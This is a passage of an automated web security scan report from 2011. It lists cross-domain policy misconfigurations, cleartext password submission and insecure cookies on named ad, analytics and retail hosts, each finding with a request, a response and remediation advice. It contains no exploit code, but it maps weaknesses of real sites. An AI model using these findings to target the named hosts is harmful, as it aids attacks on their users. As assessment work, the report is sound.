P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "2a5925-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=953
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.9. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 01:02:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.10. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:11:49 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.11. http://metrics.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:41 GMT
Server: Omniture DC/2.0.0
xserver: www59
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
5.12. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 09 May 2011 01:01:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.13. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...
5.14. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 01:01:01 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 09 May 2011 01:01:01 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
5.15. http://recs.richrelevance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.46
Date: Mon, 09 May 2011 01:00:56 GMT
Content-Type: text/plain
Content-Length: 109
Last-Modified: Tue, 24 Aug 2010 18:01:14 GMT
Connection: close
Accept-Ranges: bytes

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
5.16. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:09:08 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.17. http://wa.proflowers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:28 GMT
Server: Omniture DC/2.0.0
xserver: www90
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
5.18. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 08 May 2011 03:01:05 GMT
Expires: Mon, 09 May 2011 03:01:05 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 79194
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
5.19. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
5.20. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Mon, 09 May 2011 01:17:27 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...
5.21. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.207.55
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
5.22. http://www.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=B50374EA79D710790005C701CBAF3F88; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B50374EA79D710790005C701CBAF3F88; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:18 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 09 May 2011 01:00:18 GMT
X-Varnish: 729964574
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...
5.23. http://www.res-x.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:b77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...
5.24. http://www.proflowers.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.proflowers.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Sep 2009 20:12:48 GMT
Accept-Ranges: bytes
ETag: "13c92e8d22cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:57 GMT
Connection: close
Content-Length: 492

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
...[SNIP]...
6. Silverlight cross-domain policy  previous  next
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
6.3. http://metrics.ftd.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
xserver: www394
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.4. http://wa.proflowers.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:30 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
8. SSL cookie without secure flag set  previous  next
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
